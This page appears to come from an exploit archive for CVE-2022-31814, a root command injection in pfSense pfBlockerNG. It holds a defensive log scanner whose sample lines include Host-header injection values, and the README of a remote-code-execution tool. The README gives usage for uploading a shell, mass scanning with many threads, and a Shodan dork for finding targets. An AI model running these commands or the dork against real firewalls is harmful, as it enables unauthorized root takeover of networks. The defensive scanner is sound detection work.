PoC details: bb5d0296e7d0700e828e84cc3775fe1277039b13

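Source
Related vulnerability
Title: pfSense operating system command injection vulnerability (CVE-2022-31814)
Description: pfSense is a network firewall based on FreeBSD Linux. A security vulnerability exists in pfSense pfBlockerNG versions before 2.1.4_26. A remote attacker can execute arbitrary operating system commands as root via shell metacharacters in the HTTP Host header.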
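
A defender-side check for the Host-header abuse described above, as an added example that is not part of the original page or the PoC repository: it scans web access-log lines for Host values that are not a plain hostname or IP literal. The `host="$http_host"` log field, the sample lines and all function names are assumptions made for this example.

```python
import re

# Assumption: nginx logs the raw Host header through a custom log_format that
# ends with  host="$http_host"  (the default "combined" format omits it).
LINE_RE = re.compile(r'^(?P<src>\S+) .*"(?P<request>[^"]*)" (?P<status>\d{3}) host="(?P<host>[^"]*)"$')

# A legitimate Host value is a hostname, IPv4 address or [IPv6] literal with an optional port.
VALID_HOST_RE = re.compile(r'^(?:[A-Za-z0-9](?:[A-Za-z0-9.-]*[A-Za-z0-9])?|\[[0-9A-Fa-f:.]+\])(?::[0-9]{1,5})?$')
SHELL_META = set(";|&`$(){}<>'\"\\*?!#~ \t\r\n")

def unescape(value):
    """Undo nginx's default \\xHH escaping of quotes, backslashes and control bytes."""
    return re.sub(r'\\x([0-9A-Fa-f]{2})', lambda m: chr(int(m.group(1), 16)), value)

def classify_host(raw):
    """Return 'ok', 'malformed' or 'shell-metacharacters' for one logged Host value."""
    host = unescape(raw)
    if VALID_HOST_RE.fullmatch(host) and len(host) <= 255:
        return "ok"
    if SHELL_META & set(host):
        return "shell-metacharacters"
    return "malformed"

def scan(lines):
    """Return (source_ip, decoded_host, verdict) for every request whose Host is not 'ok'."""
    findings = []
    for line in lines:
        m = LINE_RE.match(line.strip())
        if not m:
            continue  # line is not in the assumed format
        verdict = classify_host(m["host"])
        if verdict != "ok":
            findings.append((m["src"], unescape(m["host"]), verdict))
    return findings

# Constructed sample log lines (documentation address ranges, not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2023:10:00:00 +0000] "GET / HTTP/1.1" 200 host="fw.example.test"',
    '192.0.2.10 - - [01/Jan/2023:10:00:05 +0000] "GET / HTTP/1.1" 200 host="[2001:db8::1]:8443"',
    '198.51.100.7 - - [01/Jan/2023:10:01:00 +0000] "GET / HTTP/1.1" 200 host="fw.example.test;id"',
    '198.51.100.7 - - [01/Jan/2023:10:01:02 +0000] "GET / HTTP/1.1" 200 host="x\\x22`id`"',
    '203.0.113.5 - - [01/Jan/2023:10:02:00 +0000] "GET / HTTP/1.1" 200 host="fw_example"',
]

if __name__ == "__main__":
    for src, host, verdict in scan(SAMPLE_LOG):
        print(f"{verdict:22} {src:15} Host={host!r}")
```

The same allow-list test can be applied in front of the firewall's web interface, rejecting any request whose Host header is not a plain hostname or IP literal before it reaches the application.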
Description
pfBlockerNG <= 2.1.4_26 Unauth RCE (CVE-2022-31814)
Introduction
# pfBlockerNG <= 2.1.4_26 Unauth RCE

This script is a proof-of-concept exploit for pfBlockerNG <= 2.1.4_26 that allows for remote code execution. It takes a single target URL or a list of URLs, uploads a shell, executes a command, and then deletes the shell.

## Requirements

This script requires Python 3.x and the requests module. The concurrent.futures module it also uses is part of the Python 3 standard library, so only requests needs to be installed:

```bash
pip3 install requests
```
or
```bash
pip3 install -r requirements.txt
```

## Usage

```bash
usage: exploit.py [-h] [-c COMMAND] [-l LIST] [-i IP] [-t THREADS] [-o OUTPUT]

pfBlockerNG <= 2.1.4_26 Unauth RCE

options:
  -h, --help            show this help message and exit
  -c COMMAND, --command COMMAND
                        Console Command ('id')
  -l LIST, --list LIST  List of targets (list.txt)
  -i IP, --ip IP        Base target uri (ex. http://target-uri/)
  -t THREADS, --threads THREADS
                        Number of threads for mass scan
  -o OUTPUT, --output OUTPUT
                        Output file (vuln.txt)

```

## Single Target

To exploit a single target, use the `-i` or `--ip` flag and specify the base URL or IP Address:

```bash
python3 exploit.py -i http://target-uri/ -c 'id'
```

## Multiple Targets

To scan a list of targets, use the `-l` or `--list` flag and specify the path to the list:

```bash
python3 exploit.py -l list.txt -c 'id' -t 50
```

The `-t` or `--threads` flag can be used to specify the number of threads to use for the scan.

## Output

If the `-o` or `--output` flag is specified, the list of vulnerable targets will be written to a file:

```bash
python3 exploit.py -l list.txt -c 'id' -o vuln.txt
```

## Shodan Dork:

```bash
http.title:"pfSense - Login" "Server: nginx" "Set-Cookie: PHPSESSID="
```

## ⚠️ Disclaimer

> This script is for educational purposes only. Use at your own risk.

File snapshot

```
[4.0K] /data/pocs/bb5d0296e7d0700e828e84cc3775fe1277039b13
├── [4.9K] exploit.py
├── [1.8K] README.md
└── [  53] requirements.txt

0 directories, 3 files
```